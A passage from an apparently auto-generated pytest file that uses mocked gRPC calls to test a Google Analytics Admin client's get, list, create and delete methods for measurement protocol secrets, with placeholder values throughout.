test_get_data_sharing_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_data_sharing_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_data_sharing_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_data_sharing_settings( analytics_admin.GetDataSharingSettingsRequest(), name="name_value", ) def test_get_measurement_protocol_secret( transport: str = "grpc", request_type=analytics_admin.GetMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) response = client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" def test_get_measurement_protocol_secret_from_dict(): test_get_measurement_protocol_secret(request_type=dict) def test_get_measurement_protocol_secret_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: client.get_measurement_protocol_secret() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() @pytest.mark.asyncio async def test_get_measurement_protocol_secret_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) ) response = await client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" @pytest.mark.asyncio async def test_get_measurement_protocol_secret_async_from_dict(): await test_get_measurement_protocol_secret_async(request_type=dict) def test_get_measurement_protocol_secret_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: call.return_value = resources.MeasurementProtocolSecret() client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_measurement_protocol_secret_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) await client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_measurement_protocol_secret_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_measurement_protocol_secret_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_measurement_protocol_secret( analytics_admin.GetMeasurementProtocolSecretRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_measurement_protocol_secret_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_measurement_protocol_secret_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_measurement_protocol_secret( analytics_admin.GetMeasurementProtocolSecretRequest(), name="name_value", ) def test_list_measurement_protocol_secrets( transport: str = "grpc", request_type=analytics_admin.ListMeasurementProtocolSecretsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse( next_page_token="next_page_token_value", ) response = client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListMeasurementProtocolSecretsPager) assert response.next_page_token == "next_page_token_value" def test_list_measurement_protocol_secrets_from_dict(): test_list_measurement_protocol_secrets(request_type=dict) def test_list_measurement_protocol_secrets_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: client.list_measurement_protocol_secrets() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListMeasurementProtocolSecretsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListMeasurementProtocolSecretsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async_from_dict(): await test_list_measurement_protocol_secrets_async(request_type=dict) def test_list_measurement_protocol_secrets_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListMeasurementProtocolSecretsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListMeasurementProtocolSecretsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse() ) await client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_measurement_protocol_secrets_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_measurement_protocol_secrets(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_measurement_protocol_secrets_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_measurement_protocol_secrets( analytics_admin.ListMeasurementProtocolSecretsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_measurement_protocol_secrets( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_measurement_protocol_secrets( analytics_admin.ListMeasurementProtocolSecretsRequest(), parent="parent_value", ) def test_list_measurement_protocol_secrets_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], next_page_token="abc", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[], next_page_token="def", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),], next_page_token="ghi", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_measurement_protocol_secrets(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.MeasurementProtocolSecret) for i in results) def test_list_measurement_protocol_secrets_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], next_page_token="abc", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[], next_page_token="def", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),], next_page_token="ghi", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], ), RuntimeError, ) pages = list(client.list_measurement_protocol_secrets(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], next_page_token="abc", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[], next_page_token="def", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),], next_page_token="ghi", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], ), RuntimeError, ) async_pager = await client.list_measurement_protocol_secrets(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all( isinstance(i, resources.MeasurementProtocolSecret) for i in responses ) @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], next_page_token="abc", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[], next_page_token="def", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),], next_page_token="ghi", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_measurement_protocol_secrets(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_measurement_protocol_secret( transport: str = "grpc", request_type=analytics_admin.CreateMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) response = client.create_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" def test_create_measurement_protocol_secret_from_dict(): test_create_measurement_protocol_secret(request_type=dict) def test_create_measurement_protocol_secret_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: client.create_measurement_protocol_secret() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest() @pytest.mark.asyncio async def test_create_measurement_protocol_secret_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) ) response = await client.create_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" @pytest.mark.asyncio async def test_create_measurement_protocol_secret_async_from_dict(): await test_create_measurement_protocol_secret_async(request_type=dict) def test_create_measurement_protocol_secret_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateMeasurementProtocolSecretRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: call.return_value = resources.MeasurementProtocolSecret() client.create_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_measurement_protocol_secret_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateMeasurementProtocolSecretRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) await client.create_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_measurement_protocol_secret_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_measurement_protocol_secret( parent="parent_value", measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].measurement_protocol_secret == resources.MeasurementProtocolSecret( name="name_value" ) def test_create_measurement_protocol_secret_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_measurement_protocol_secret( analytics_admin.CreateMeasurementProtocolSecretRequest(), parent="parent_value", measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), ) @pytest.mark.asyncio async def test_create_measurement_protocol_secret_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_measurement_protocol_secret( parent="parent_value", measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].measurement_protocol_secret == resources.MeasurementProtocolSecret( name="name_value" ) @pytest.mark.asyncio async def test_create_measurement_protocol_secret_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_measurement_protocol_secret( analytics_admin.CreateMeasurementProtocolSecretRequest(), parent="parent_value", measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), ) def test_delete_measurement_protocol_secret( transport: str = "grpc", request_type=analytics_admin.DeleteMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_measurement_protocol_secret_from_dict(): test_delete_measurement_protocol_secret(request_type=dict) def test_delete_measurement_protocol_secret_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: client.delete_measurement_protocol_secret() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest() @pytest.mark.asyncio async def test_delete_measurement_protocol_secret_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_measurement_protocol_secret_async_from_dict(): await test_delete_measurement_protocol_secret_async(request_type=dict) def test_delete_measurement_protocol_secret_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: call.return_value = None client.delete_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_measurement_protocol_secret_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_measurement_protocol_secret_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_measurement_protocol_secret_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_measurement_protocol_secret( analytics_admin.DeleteMeasurementProtocolSecretRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_measurement_protocol_secret_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_measurement_protocol_secret_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a 